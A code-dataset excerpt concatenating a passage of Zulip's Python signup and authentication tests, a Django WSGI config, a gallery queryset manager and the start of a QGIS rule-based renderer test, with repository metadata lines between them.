AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map,
):
result = self.submit_reg_form_for_user(
email,
password,
from_confirmation="1",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver",
)
self.assertEqual(result.status_code, 200)
result = self.submit_reg_form_for_user(
email,
password,
full_name="Non-LDAP Full Name",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver",
)
self.assertEqual(result.status_code, 302)
# We get redirected back to the login page because password was wrong
self.assertEqual(result.url, "/accounts/login/?email=newuser_email%40zulip.com")
self.assertFalse(UserProfile.objects.filter(delivery_email=email).exists())
# If the user's email is not in the LDAP directory , though, we
# successfully create an account with a password in the Zulip
# database.
password = "nonldappassword"
email = "nonexistent@zulip.com"
subdomain = "zulip"
with patch("zerver.views.registration.get_subdomain", return_value=subdomain):
result = self.client_post("/register/", {"email": email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(f"/accounts/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
with self.settings(
POPULATE_PROFILE_VIA_LDAP=True,
LDAP_EMAIL_ATTR="mail",
AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map,
):
with self.assertLogs(level="WARNING") as m:
result = self.submit_reg_form_for_user(
email,
password,
from_confirmation="1",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver",
)
self.assertEqual(result.status_code, 200)
self.assertEqual(
m.output,
[
"WARNING:root:New account email nonexistent@zulip.com could not be found in LDAP"
],
)
with self.assertLogs("zulip.ldap", "DEBUG") as debug_log:
result = self.submit_reg_form_for_user(
email,
password,
full_name="Non-LDAP Full Name",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver",
)
self.assertEqual(
debug_log.output,
[
"DEBUG:zulip.ldap:ZulipLDAPAuthBackend: No LDAP user matching django_to_ldap_username result: nonexistent@zulip.com. Input username: nonexistent@zulip.com"
],
)
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, "http://zulip.testserver/")
user_profile = UserProfile.objects.get(delivery_email=email)
# Name comes from the POST request, not LDAP
self.assertEqual(user_profile.full_name, "Non-LDAP Full Name")
def ldap_invite_and_signup_as(
self, invite_as: int, streams: Sequence[str] = ["Denmark"]
) -> None:
self.init_default_ldap_database()
ldap_user_attr_map = {"full_name": "cn"}
subdomain = "zulip"
email = "newuser@zulip.com"
password = self.ldap_password("newuser")
with self.settings(
POPULATE_PROFILE_VIA_LDAP=True,
LDAP_APPEND_DOMAIN="zulip.com",
AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map,
):
with self.assertLogs("zulip.ldap", "DEBUG") as debug_log:
# Invite user.
self.login("iago")
self.assertEqual(
debug_log.output,
[
"DEBUG:zulip.ldap:ZulipLDAPAuthBackend: No LDAP user matching django_to_ldap_username result: iago. Input username: iago@zulip.com"
],
)
response = self.invite(
invitee_emails="newuser@zulip.com", stream_names=streams, invite_as=invite_as
)
self.assert_json_success(response)
self.logout()
result = self.submit_reg_form_for_user(
email,
password,
full_name="Ignore",
from_confirmation="1",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver",
)
self.assertEqual(result.status_code, 200)
result = self.submit_reg_form_for_user(
email,
password,
full_name="Ignore",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver",
)
self.assertEqual(result.status_code, 302)
@override_settings(
AUTHENTICATION_BACKENDS=(
"zproject.backends.ZulipLDAPAuthBackend",
"zproject.backends.EmailAuthBackend",
)
)
def test_ldap_invite_user_as_admin(self) -> None:
self.ldap_invite_and_signup_as(PreregistrationUser.INVITE_AS["REALM_ADMIN"])
user_profile = UserProfile.objects.get(delivery_email=self.nonreg_email("newuser"))
self.assertTrue(user_profile.is_realm_admin)
@override_settings(
AUTHENTICATION_BACKENDS=(
"zproject.backends.ZulipLDAPAuthBackend",
"zproject.backends.EmailAuthBackend",
)
)
def test_ldap_invite_user_as_guest(self) -> None:
self.ldap_invite_and_signup_as(PreregistrationUser.INVITE_AS["GUEST_USER"])
user_profile = UserProfile.objects.get(delivery_email=self.nonreg_email("newuser"))
self.assertTrue(user_profile.is_guest)
@override_settings(
AUTHENTICATION_BACKENDS=(
"zproject.backends.ZulipLDAPAuthBackend",
"zproject.backends.EmailAuthBackend",
)
)
def test_ldap_invite_streams(self) -> None:
stream_name = "Rome"
realm = get_realm("zulip")
stream = get_stream(stream_name, realm)
default_streams = get_default_streams_for_realm(realm)
default_streams_name = [stream.name for stream in default_streams]
self.assertNotIn(stream_name, default_streams_name)
# Invite user.
self.ldap_invite_and_signup_as(
PreregistrationUser.INVITE_AS["REALM_ADMIN"], streams=[stream_name]
)
user_profile = UserProfile.objects.get(delivery_email=self.nonreg_email("newuser"))
self.assertTrue(user_profile.is_realm_admin)
sub = get_stream_subscriptions_for_user(user_profile).filter(recipient__type_id=stream.id)
self.assert_length(sub, 1)
def test_registration_when_name_changes_are_disabled(self) -> None:
"""
Test `name_changes_disabled` when we are not running under LDAP.
"""
password = self.ldap_password("newuser")
email = "newuser@zulip.com"
subdomain = "zulip"
with patch("zerver.views.registration.get_subdomain", return_value=subdomain):
result = self.client_post("/register/", {"email": email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(f"/accounts/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
with patch("zerver.views.registration.name_changes_disabled", return_value=True):
result = self.submit_reg_form_for_user(
email,
password,
full_name="New Name",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver",
)
user_profile = UserProfile.objects.get(delivery_email=email)
# 'New Name' comes from POST data; not from LDAP session.
self.assertEqual(user_profile.full_name, "New Name")
def test_realm_creation_through_ldap(self) -> None:
password = self.ldap_password("newuser")
email = "newuser@zulip.com"
subdomain = "zulip"
realm_name = "Zulip"
self.init_default_ldap_database()
ldap_user_attr_map = {"full_name": "cn"}
with patch("zerver.views.registration.get_subdomain", return_value=subdomain):
result = self.client_post("/register/", {"email": email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(f"/accounts/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
# Visit the confirmation link.
from django.core.mail import outbox
for message in reversed(outbox):
if email in message.to:
match = re.search(settings.EXTERNAL_HOST + r"(\S+)>", message.body)
assert match is not None
[confirmation_url] = match.groups()
break
else:
raise AssertionError("Couldn't find a confirmation email.")
with self.settings(
POPULATE_PROFILE_VIA_LDAP=True,
LDAP_APPEND_DOMAIN="zulip.com",
AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map,
AUTHENTICATION_BACKENDS=("zproject.backends.ZulipLDAPAuthBackend",),
TERMS_OF_SERVICE=False,
):
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
key = find_key_by_email(email)
confirmation = Confirmation.objects.get(confirmation_key=key)
prereg_user = confirmation.content_object
prereg_user.realm_creation = True
prereg_user.save()
result = self.submit_reg_form_for_user(
email,
password,
realm_name=realm_name,
realm_subdomain=subdomain,
from_confirmation="1",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver",
)
self.assert_in_success_response(
["We just need you to do one last thing.", "newuser@zulip.com"], result
)
@patch(
"DNS.dnslookup",
return_value=[["sipbtest:*:20922:101:Fred Sipb,,,:/mit/sipbtest:/bin/athena/tcsh"]],
)
def test_registration_of_mirror_dummy_user(self, ignored: Any) -> None:
password = "test"
subdomain = "zephyr"
user_profile = self.mit_user("sipbtest")
email = user_profile.delivery_email
user_profile.is_mirror_dummy = True
user_profile.save()
change_user_is_active(user_profile, False)
result = self.client_post("/register/", {"email": email}, subdomain="zephyr")
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(f"/accounts/send_confirm/{email}"))
result = self.client_get(result["Location"], subdomain="zephyr")
self.assert_in_response("Check your email so we can get started.", result)
# Visit the confirmation link.
from django.core.mail import outbox
for message in reversed(outbox):
if email in message.to:
match = re.search(settings.EXTERNAL_HOST + r"(\S+)>", message.body)
assert match is not None
[confirmation_url] = match.groups()
break
else:
raise AssertionError("Couldn't find a confirmation email.")
result = self.client_get(confirmation_url, subdomain="zephyr")
self.assertEqual(result.status_code, 200)
# If the mirror dummy user is already active, attempting to
# submit the registration form should raise an AssertionError
# (this is an invalid state, so it's a bug we got here):
change_user_is_active(user_profile, True)
with self.assertRaisesRegex(
AssertionError, "Mirror dummy user is already active!"
), self.assertLogs("django.request", "ERROR") as error_log:
result = self.submit_reg_form_for_user(
email,
password,
from_confirmation="1",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver",
)
self.assertTrue(
"ERROR:django.request:Internal Server Error: /accounts/register/" in error_log.output[0]
)
self.assertTrue(
'raise AssertionError("Mirror dummy user is already active!' in error_log.output[0]
)
self.assertTrue(
"AssertionError: Mirror dummy user is already active!" in error_log.output[0]
)
change_user_is_active(user_profile, False)
result = self.submit_reg_form_for_user(
email,
password,
from_confirmation="1",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver",
)
self.assertEqual(result.status_code, 200)
result = self.submit_reg_form_for_user(
email,
password,
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver",
)
self.assertEqual(result.status_code, 302)
self.assert_logged_in_user_id(user_profile.id)
@patch(
"DNS.dnslookup",
return_value=[["sipbtest:*:20922:101:Fred Sipb,,,:/mit/sipbtest:/bin/athena/tcsh"]],
)
def test_registration_of_active_mirror_dummy_user(self, ignored: Any) -> None:
"""
Trying to activate an already-active mirror dummy user should
raise an AssertionError.
"""
user_profile = self.mit_user("sipbtest")
email = user_profile.delivery_email
user_profile.is_mirror_dummy = True
user_profile.save()
change_user_is_active(user_profile, True)
with self.assertRaisesRegex(
AssertionError, "Mirror dummy user is already active!"
), self.assertLogs("django.request", "ERROR") as error_log:
self.client_post("/register/", {"email": email}, subdomain="zephyr")
self.assertTrue(
"ERROR:django.request:Internal Server Error: /register/" in error_log.output[0]
)
self.assertTrue(
'raise AssertionError("Mirror dummy user is already active!' in error_log.output[0]
)
self.assertTrue(
"AssertionError: Mirror dummy user is already active!" in error_log.output[0]
)
@override_settings(TERMS_OF_SERVICE=False)
def test_dev_user_registration(self) -> None:
"""Verify that /devtools/register_user creates a new user, logs them
in, and redirects to the logged-in app."""
count = UserProfile.objects.count()
email = f"user-{count}@zulip.com"
result = self.client_post("/devtools/register_user/")
user_profile = UserProfile.objects.all().order_by("id").last()
self.assertEqual(result.status_code, 302)
self.assertEqual(user_profile.delivery_email, email)
self.assertEqual(result["Location"], "http://zulip.testserver/")
self.assert_logged_in_user_id(user_profile.id)
@override_settings(TERMS_OF_SERVICE=False)
def test_dev_user_registration_create_realm(self) -> None:
count = UserProfile.objects.count()
string_id = f"realm-{count}"
result = self.client_post("/devtools/register_realm/")
self.assertEqual(result.status_code, 302)
self.assertTrue(
result["Location"].startswith(f"http://{string_id}.testserver/accounts/login/subdomain")
)
result = self.client_get(result["Location"], subdomain=string_id)
self.assertEqual(result.status_code, 302)
self.assertEqual(result["Location"], f"http://{string_id}.testserver")
user_profile = UserProfile.objects.all().order_by("id").last()
self.assert_logged_in_user_id(user_profile.id)
class DeactivateUserTest(ZulipTestCase):
def test_deactivate_user(self) -> None:
user = self.example_user("hamlet")
email = user.email
self.login_user(user)
self.assertTrue(user.is_active)
result = self.client_delete("/json/users/me")
self.assert_json_success(result)
user = self.example_user("hamlet")
self.assertFalse(user.is_active)
password = initial_password(email)
assert password is not None
self.assert_login_failure(email, password=password)
def test_do_not_deactivate_final_owner(self) -> None:
user = self.example_user("desdemona")
user_2 = self.example_user("iago")
self.login_user(user)
self.assertTrue(user.is_active)
result = self.client_delete("/json/users/me")
self.assert_json_error(result, "Cannot deactivate the only organization owner.")
user = self.example_user("desdemona")
self.assertTrue(user.is_active)
self.assertTrue(user.is_realm_owner)
do_change_user_role(user_2, UserProfile.ROLE_REALM_OWNER, acting_user=None)
self.assertTrue(user_2.is_realm_owner)
result = self.client_delete("/json/users/me")
self.assert_json_success(result)
do_change_user_role(user, UserProfile.ROLE_REALM_OWNER, acting_user=None)
def test_do_not_deactivate_final_user(self) -> None:
realm = get_realm("zulip")
for user_profile in UserProfile.objects.filter(realm=realm).exclude(
role=UserProfile.ROLE_REALM_OWNER
):
do_deactivate_user(user_profile, acting_user=None)
user = self.example_user("desdemona")
self.login_user(user)
result = self.client_delete("/json/users/me")
self.assert_json_error(result, "Cannot deactivate the only user.")
class TestLoginPage(ZulipTestCase):
@patch("django.http.HttpRequest.get_host")
def test_login_page_redirects_for_root_alias(self, mock_get_host: MagicMock) -> None:
mock_get_host.return_value = "www.testserver"
with self.settings(ROOT_DOMAIN_LANDING_PAGE=True):
result = self.client_get("/en/login/")
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, "/accounts/go/")
result = self.client_get("/en/login/", {"next": "/upgrade/"})
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, "/accounts/go/?next=%2Fupgrade%2F")
@patch("django.http.HttpRequest.get_host")
def test_login_page_redirects_for_root_domain(self, mock_get_host: MagicMock) -> None:
mock_get_host.return_value = "testserver"
with self.settings(ROOT_DOMAIN_LANDING_PAGE=True):
result = self.client_get("/en/login/")
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, "/accounts/go/")
result = self.client_get("/en/login/", {"next": "/upgrade/"})
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, "/accounts/go/?next=%2Fupgrade%2F")
mock_get_host.return_value = "www.testserver.com"
with self.settings(
ROOT_DOMAIN_LANDING_PAGE=True,
EXTERNAL_HOST="www.testserver.com",
ROOT_SUBDOMAIN_ALIASES=["test"],
):
result = self.client_get("/en/login/")
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, "/accounts/go/")
result = self.client_get("/en/login/", {"next": "/upgrade/"})
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, "/accounts/go/?next=%2Fupgrade%2F")
@patch("django.http.HttpRequest.get_host")
def test_login_page_works_without_subdomains(self, mock_get_host: MagicMock) -> None:
mock_get_host.return_value = "www.testserver"
with self.settings(ROOT_SUBDOMAIN_ALIASES=["www"]):
result = self.client_get("/en/login/")
self.assertEqual(result.status_code, 200)
mock_get_host.return_value = "testserver"
with self.settings(ROOT_SUBDOMAIN_ALIASES=["www"]):
result = self.client_get("/en/login/")
self.assertEqual(result.status_code, 200)
def test_login_page_registration_hint(self) -> None:
response = self.client_get("/login/")
self.assert_not_in_success_response(
["Don't have an account yet? You need to be invited to join this organization."],
response,
)
realm = get_realm("zulip")
realm.invite_required = True
realm.save(update_fields=["invite_required"])
response = self.client_get("/login/")
self.assert_in_success_response(
["Don't have an account yet? You need to be invited to join this organization."],
response,
)
class TestFindMyTeam(ZulipTestCase):
def test_template(self) -> None:
result = self.client_get("/accounts/find/")
self.assertIn("Find your Zulip accounts", result.content.decode("utf8"))
def test_result(self) -> None:
# We capitalize a letter in cordelia's email to test that the search is case-insensitive.
result = self.client_post(
"/accounts/find/", dict(emails="iago@zulip.com,cordeliA@zulip.com")
)
self.assertEqual(result.status_code, 302)
self.assertEqual(
result.url, "/accounts/find/?emails=iago%40zulip.com%2CcordeliA%40zulip.com"
)
result = self.client_get(result.url)
content = result.content.decode("utf8")
self.assertIn("Emails sent! You will only receive emails", content)
self.assertIn("iago@zulip.com", content)
self.assertIn("cordeliA@zulip.com", content)
from django.core.mail import outbox
# 3 = 1 + 2 -- Cordelia gets an email each for the "zulip" and "lear" realms.
self.assert_length(outbox, 3)
def test_find_team_ignore_invalid_email(self) -> None:
result = self.client_post(
"/accounts/find/", dict(emails="iago@zulip.com,invalid_email@zulip.com")
)
self.assertEqual(result.status_code, 302)
self.assertEqual(
result.url, "/accounts/find/?emails=iago%40zulip.com%2Cinvalid_email%40zulip.com"
)
result = self.client_get(result.url)
content = result.content.decode("utf8")
self.assertIn("Emails sent! You will only receive emails", content)
self.assertIn(self.example_email("iago"), content)
self.assertIn("invalid_email@", content)
from django.core.mail import outbox
self.assert_length(outbox, 1)
def test_find_team_reject_invalid_email(self) -> None:
result = self.client_post("/accounts/find/", dict(emails="invalid_string"))
self.assertEqual(result.status_code, 200)
self.assertIn(b"Enter a valid email", result.content)
from django.core.mail import outbox
self.assert_length(outbox, 0)
# Just for coverage on perhaps-unnecessary validation code.
result = self.client_get("/accounts/find/", {"emails": "invalid"})
self.assertEqual(result.status_code, 200)
def test_find_team_zero_emails(self) -> None:
data = {"emails": ""}
result = self.client_post("/accounts/find/", data)
self.assertIn("This field is required", result.content.decode("utf8"))
self.assertEqual(result.status_code, 200)
from django.core.mail import outbox
self.assert_length(outbox, 0)
def test_find_team_one_email(self) -> None:
data = {"emails": self.example_email("hamlet")}
result = self.client_post("/accounts/find/", data)
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, "/accounts/find/?emails=hamlet%40zulip.com")
from django.core.mail import outbox
self.assert_length(outbox, 1)
def test_find_team_deactivated_user(self) -> None:
do_deactivate_user(self.example_user("hamlet"), acting_user=None)
data = {"emails": self.example_email("hamlet")}
result = self.client_post("/accounts/find/", data)
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, "/accounts/find/?emails=hamlet%40zulip.com")
from django.core.mail import outbox
self.assert_length(outbox, 0)
def test_find_team_deactivated_realm(self) -> None:
do_deactivate_realm(get_realm("zulip"), acting_user=None)
data = {"emails": self.example_email("hamlet")}
result = self.client_post("/accounts/find/", data)
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, "/accounts/find/?emails=hamlet%40zulip.com")
from django.core.mail import outbox
self.assert_length(outbox, 0)
def test_find_team_bot_email(self) -> None:
data = {"emails": self.example_email("webhook_bot")}
result = self.client_post("/accounts/find/", data)
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, "/accounts/find/?emails=webhook-bot%40zulip.com")
from django.core.mail import outbox
self.assert_length(outbox, 0)
def test_find_team_more_than_ten_emails(self) -> None:
data = {"emails": ",".join(f"hamlet-{i}@zulip.com" for i in range(11))}
result = self.client_post("/accounts/find/", data)
self.assertEqual(result.status_code, 200)
self.assertIn("Please enter at most 10", result.content.decode("utf8"))
from django.core.mail import outbox
self.assert_length(outbox, 0)
class ConfirmationKeyTest(ZulipTestCase):
def test_confirmation_key(self) -> None:
request = MagicMock()
request.session = {
"confirmation_key": {"confirmation_key": "xyzzy"},
}
result = confirmation_key(request)
self.assert_json_success(result)
self.assert_in_response("xyzzy", result)
class MobileAuthOTPTest(ZulipTestCase):
def test_xor_hex_strings(self) -> None:
self.assertEqual(xor_hex_strings("1237c81ab", "18989fd12"), "0aaf57cb9")
with self.assertRaises(AssertionError):
xor_hex_strings("1", "31")
def test_is_valid_otp(self) -> None:
self.assertEqual(is_valid_otp("1234"), False)
self.assertEqual(is_valid_otp("1234abcd" * 8), True)
self.assertEqual(is_valid_otp("1234abcZ" * 8), False)
def test_ascii_to_hex(self) -> None:
self.assertEqual(ascii_to_hex("ZcdR1234"), "5a63645231323334")
self.assertEqual(hex_to_ascii("5a63645231323334"), "ZcdR1234")
def test_otp_encrypt_api_key(self) -> None:
api_key = "12ac" * 8
otp = "7be38894" * 8
result = otp_encrypt_api_key(api_key, otp)
self.assertEqual(result, "4ad1e9f7" * 8)
decryped = otp_decrypt_api_key(result, otp)
self.assertEqual(decryped, api_key)
class FollowupEmailTest(ZulipTestCase):
def test_followup_day2_email(self) -> None:
user_profile = self.example_user("hamlet")
# Test date_joined == Sunday
user_profile.date_joined = datetime.datetime(
2018, 1, 7, 1, 0, 0, 0, tzinfo=datetime.timezone.utc
)
self.assertEqual(
followup_day2_email_delay(user_profile), datetime.timedelta(days=2, hours=-1)
)
# Test date_joined == Tuesday
user_profile.date_joined = datetime.datetime(
2018, 1, 2, 1, 0, 0, 0, tzinfo=datetime.timezone.utc
)
self.assertEqual(
followup_day2_email_delay(user_profile), datetime.timedelta(days=2, hours=-1)
)
# Test date_joined == Thursday
user_profile.date_joined = datetime.datetime(
2018, 1, 4, 1, 0, 0, 0, tzinfo=datetime.timezone.utc
)
self.assertEqual(
followup_day2_email_delay(user_profile), datetime.timedelta(days=1, hours=-1)
)
# Test date_joined == Friday
user_profile.date_joined = datetime.datetime(
2018, 1, 5, 1, 0, 0, 0, tzinfo=datetime.timezone.utc
)
self.assertEqual(
followup_day2_email_delay(user_profile), datetime.timedelta(days=3, hours=-1)
)
# Time offset of America/Phoenix is -07:00
user_profile.timezone = "America/Phoenix"
# Test date_joined == Friday in UTC, but Thursday in the user's timezone
user_profile.date_joined = datetime.datetime(
2018, 1, 5, 1, 0, 0, 0, tzinfo=datetime.timezone.utc
)
self.assertEqual(
followup_day2_email_delay(user_profile), datetime.timedelta(days=1, hours=-1)
)
class NoReplyEmailTest(ZulipTestCase):
def test_noreply_email_address(self) -> None:
self.assertTrue(
re.search(self.TOKENIZED_NOREPLY_REGEX, FromAddress.tokenized_no_reply_address())
)
with self.settings(ADD_TOKENS_TO_NOREPLY_ADDRESS=False):
self.assertEqual(FromAddress.tokenized_no_reply_address(), "noreply@testserver")
class TwoFactorAuthTest(ZulipTestCase):
@patch("two_factor.models.totp")
def test_two_factor_login(self, mock_totp: MagicMock) -> None:
token = 123456
email = self.example_email("hamlet")
password = self.ldap_password("hamlet")
user_profile = self.example_user("hamlet")
user_profile.set_password(password)
user_profile.save()
self.create_default_device(user_profile)
def totp(*args: Any, **kwargs: Any) -> int:
return token
mock_totp.side_effect = totp
with self.settings(
AUTHENTICATION_BACKENDS=("zproject.backends.EmailAuthBackend",),
TWO_FACTOR_CALL_GATEWAY="two_factor.gateways.fake.Fake",
TWO_FACTOR_SMS_GATEWAY="two_factor.gateways.fake.Fake",
TWO_FACTOR_AUTHENTICATION_ENABLED=True,
):
first_step_data = {
"username": email,
"password": password,
"two_factor_login_view-current_step": "auth",
}
with self.assertLogs("two_factor.gateways.fake", "INFO") as info_logs:
result = self.client_post("/accounts/login/", first_step_data)
self.assertEqual(
info_logs.output,
['INFO:two_factor.gateways.fake:Fake SMS to +12125550100: "Your token is: 123456"'],
)
self.assertEqual(result.status_code, 200)
second_step_data = {
"token-otp_token": str(token),
"two_factor_login_view-current_step": "token",
}
result = self.client_post("/accounts/login/", second_step_data)
self.assertEqual(result.status_code, 302)
self.assertEqual(result["Location"], "http://zulip.testserver")
# Going to login page should redirect to '/' if user is already
# logged in.
result = self.client_get("/accounts/login/")
self.assertEqual(result["Location"], "http://zulip.testserver")
class NameRestrictionsTest(ZulipTestCase):
def test_whitelisted_disposable_domains(self) -> None:
self.assertFalse(is_disposable_domain("OPayQ.com"))
class RealmRedirectTest(ZulipTestCase):
def test_realm_redirect_without_next_param(self) -> None:
result = self.client_get("/accounts/go/")
self.assert_in_success_response(["Enter your organization's Zulip URL"], result)
result = self.client_post("/accounts/go/", {"subdomain": "zephyr"})
self.assertEqual(result.status_code, 302)
self.assertEqual(result["Location"], "http://zephyr.testserver")
result = self.client_post("/accounts/go/", {"subdomain": "invalid"})
self.assert_in_success_response(["We couldn't find that Zulip organization."], result)
def test_realm_redirect_with_next_param(self) -> None:
result = self.client_get("/accounts/go/", {"next": "billing"})
self.assert_in_success_response(
["Enter your organization's Zulip URL", 'action="/accounts/go/?next=billing"'], result
)
result = self.client_post("/accounts/go/?next=billing", {"subdomain": "lear"})
self.assertEqual(result.status_code, 302)
self.assertEqual(result["Location"], "http://lear.testserver/billing")
|
punchagan/zulip
|
zerver/tests/test_signup.py
|
Python
|
apache-2.0
| 225,136 | 0.002394 |
"""
WSGI config for billboards project.
This module contains the WSGI application used by Django's development server
and any production WSGI deployments. It should expose a module-level variable
named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover
this application via the ``WSGI_APPLICATION`` setting.
Usually you will have the standard Django WSGI application here, but it also
might make sense to replace the whole Django WSGI application with a custom one
that later delegates to the Django one. For example, you could introduce WSGI
middleware here, or combine a Django application with an application of another
framework.
"""
import os
from os.path import abspath, dirname
from sys import path
SITE_ROOT = dirname(dirname(abspath(__file__)))
path.append(SITE_ROOT)
# We defer to a DJANGO_SETTINGS_MODULE already in the environment. This breaks
# if running multiple sites in the same mod_wsgi process. To fix this, use
# mod_wsgi daemon mode with each site in its own daemon process, or use
# os.environ["DJANGO_SETTINGS_MODULE"] = "jajaja.settings"
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "billboards.settings.production")
# This application object is used by any WSGI server configured to use this
# file. This includes Django's development server, if the WSGI_APPLICATION
# setting points here.
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
# Apply WSGI middleware here.
# from helloworld.wsgi import HelloWorldApplication
# application = HelloWorldApplication(application)
|
serefimov/billboards
|
billboards/billboards/wsgi.py
|
Python
|
mit
| 1,568 | 0.001276 |
from django.db import models
from django.db.models import OuterRef, Subquery, Count
from django.db.models.functions import Coalesce
class GalleryManager(models.Manager):
def annotated_gallery(self):
"""Annotate gallery with
- ``linked_content``, which contains the pk of the associated content if any ;
- ``image_count``, which contains the number of images.
:rtype: QuerySet
"""
from zds.tutorialv2.models.database import PublishableContent
from zds.gallery.models import Image
linked_content = PublishableContent.objects.filter(gallery__pk=OuterRef("pk")).values("pk")
images = (
Image.objects.filter(gallery__pk=OuterRef("pk"))
.values("gallery")
.annotate(count=Count("pk"))
.values("count")
)
return self.annotate(linked_content=Subquery(linked_content)).annotate(
image_count=Coalesce(Subquery(images), 0)
)
def galleries_of_user(self, user):
"""Get galleries of user, and annotate with an extra field ``user_mode`` (which contains R or W)
:param user: the user
:type user: zds.member.models.User
:rtype: QuerySet
"""
from zds.gallery.models import UserGallery
user_galleries = UserGallery.objects.filter(user=user).prefetch_related("gallery").values("gallery__pk")
user_mode = UserGallery.objects.filter(user=user, gallery__pk=OuterRef("pk"))
return (
self.annotated_gallery()
.filter(pk__in=user_galleries)
.annotate(user_mode=Subquery(user_mode.values("mode")))
)
|
ChantyTaguan/zds-site
|
zds/gallery/managers.py
|
Python
|
gpl-3.0
| 1,665 | 0.003003 |
# -*- coding: utf-8 -*-
"""
***************************************************************************
test_qgsrulebasedrenderer.py
---------------------
Date : September 2015
Copyright : (C) 2015 by Matthias Kuhn
Email : matthias at opengis dot ch
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
From build dir, run: ctest -R PyQgsRulebasedRenderer -V
"""
__author__ = 'Matthias Kuhn'
__date__ = 'September 2015'
__copyright__ = '(C) 2015, Matthiasd Kuhn'
import qgis # NOQA
import os
from qgis.PyQt.QtCore import Qt, QSize
from qgis.PyQt.QtGui import QColor
from qgis.core import (QgsVectorLayer,
QgsMapSettings,
QgsProject,
QgsRectangle,
QgsMultiRenderChecker,
QgsRuleBasedRenderer,
QgsFillSymbol,
QgsMarkerSymbol,
QgsRendererCategory,
QgsCategorizedSymbolRenderer,
QgsGraduatedSymbolRenderer,
QgsRendererRange,
QgsRenderContext,
QgsSymbolLayer,
QgsSimpleMarkerSymbolLayer,
QgsProperty,
QgsFeature,
QgsGeometry,
QgsEmbeddedSymbolRenderer
)
from qgis.testing import start_app, unittest
from utilities import unitTestDataPath
# Convenience instances in case you may need them
# not used in this test
start_app()
TEST_DATA_DIR = unitTestDataPath()
class TestQgsRulebasedRenderer(unittest.TestCase):
@classmethod
def setUpClass(cls):
# Super ugly hack to make sure python does not clean up our mapsetting objects
# this might lead to occasional crashes on travis
cls.mapsettings_archive = list()
def setUp(self):
myShpFile = os.path.join(TEST_DATA_DIR, 'rectangles.shp')
layer = QgsVectorLayer(myShpFile, 'Rectangles', 'ogr')
QgsProject.instance().addMapLayer(layer)
# Create rulebased style
sym1 = QgsFillSymbol.createSimple({'color': '#fdbf6f', 'outline_color': 'black'})
sym2 = QgsFillSymbol.createSimple({'color': '#71bd6c', 'outline_color': 'black'})
sym3 = QgsFillSymbol.createSimple({'color': '#1f78b4', 'outline_color': 'black'})
self.r1 = QgsRuleBasedRenderer.Rule(sym1, 0, 0, '"id" = 1')
self.r2 = QgsRuleBasedRenderer.Rule(sym2, 0, 0, '"id" = 2')
self.r3 = QgsRuleBasedRenderer.Rule(sym3, 0, 0, 'ELSE')
rootrule = QgsRuleBasedRenderer.Rule(None)
rootrule.appendChild(self.r1)
rootrule.appendChild(self.r2)
rootrule.appendChild(self.r3)
layer.setRenderer(QgsRuleBasedRenderer(rootrule))
self.mapsettings = QgsMapSettings()
self.mapsettings.setOutputSize(QSize(400, 400))
self.mapsettings.setOutputDpi(96)
self.mapsettings.setExtent(QgsRectangle(-163, 22, -70, 52))
rendered_layers = [layer]
self.mapsettings.setLayers(rendered_layers)
self.mapsettings_archive.append(self.mapsettings)
def testElse(self):
# Setup rendering check
renderchecker = QgsMultiRenderChecker()
renderchecker.setMapSettings(self.mapsettings)
renderchecker.setControlName('expected_rulebased_else')
self.assertTrue(renderchecker.runTest('rulebased_else'))
def testDisabledElse(self):
# Disable a rule and assert that it's hidden not rendered with else
self.r2.setActive(False)
renderchecker = QgsMultiRenderChecker()
renderchecker.setMapSettings(self.mapsettings)
renderchecker.setControlName('expected_rulebased_disabled_else')
self.assertTrue(renderchecker.runTest('rulebased_disabled_else'))
def testWillRenderFeature(self):
vl = self.mapsettings.layers()[0]
ft = vl.getFeature(0) # 'id' = 1
renderer = vl.renderer()
ctx = QgsRenderContext.fromMapSettings(self.mapsettings)
ctx.expressionContext().setFeature(ft)
renderer.rootRule().children()[0].setActive(False)
renderer.rootRule().children()[1].setActive(True)
renderer.rootRule().children()[2].setActive(True)
